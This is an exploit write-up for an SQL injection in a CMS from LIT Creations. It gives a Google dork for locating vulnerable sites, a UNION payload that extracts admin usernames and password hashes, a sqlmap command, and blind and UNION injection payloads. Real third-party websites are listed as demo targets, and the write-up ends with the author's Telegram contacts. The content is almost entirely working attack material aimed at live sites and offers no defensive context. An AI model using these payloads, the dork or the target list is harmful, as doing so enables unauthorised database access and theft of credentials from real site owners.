#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# Exploit Title: LIT Creations African CMS SQL injection
# Date: 2019-05-20
# Dork : intext:"Website designed and hosted by LIT Creations" inurl:id=
# Exploit Author: S I R M A X
# Vendor Homepage: https://www.litcreations.com/
# Version: All Version
# Tested on: win,linux
=================================================================================
[SQL injection]
[+] Method ( Sql injection ) H_A_Security Security Team of IRan
[+] parameter : ID == php?ID=
=================================================================================
Mode Hash : MD5
=================
-----== Way 1(No machine use) ==-----
[#] Testing Method:
[+] - UNION query
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Exploits ==>
[*] id=-847' UNION SELECT 1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(table(admin))WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,usern,0x3c62723e,0x70617373,0x203d3d3e20,pswrd,0x3c62723e,0x3c62723e))))x),3,4,5,6,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(table(admin))WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,usern,0x3c62723e,0x70617373,0x203d3d3e20,pswrd,0x3c62723e,0x3c62723e))))x),[Number of columns]-- -
<-> #At all sites, Column 2 or 7 is 100% vulnerable
<-> #Note that you should find the name of the admin table and put it in the exploit
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
=================================================================================================================================
-----== Way 2(using the machine) ==-----
[+] Sqlmap:
[-] sqlmap.py -u https://gohealthy.co.za/product.php?id=1 --dbs
[#] Testing Method:
[+] - boolean-based blind
[+] - time-based blind
[+] - UNION query
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|||||||||||||||||||||||
Parameter: id (GET) ||
|||||||||||||||||||||||
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=847' AND 5651=5651 AND 'gEnD'='gEnD
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=847' AND SLEEP(5) AND 'spZF'='spZF
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Type: UNION query
Title: Generic UNION query (NULL) - 23 columns
Payload: id=-9178' UNION ALL SELECT NULL,CONCAT(0x716a717871,0x466f4b58426e547a66684763786150476779496f4b556548427069736d70664d414f5771615a6a50,0x716b7a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- qUjC
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
=================================================================================
Demo:
[+] https://www.thelearningpoint.co.za/events.php?id=[SQL]
[+] https://gohealthy.co.za/product.php?id=[SQL]
=================================================================================
[=] T.me/Sir_Max
[=] Telegram Channel ==> @H_A_SeCuRiTy
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#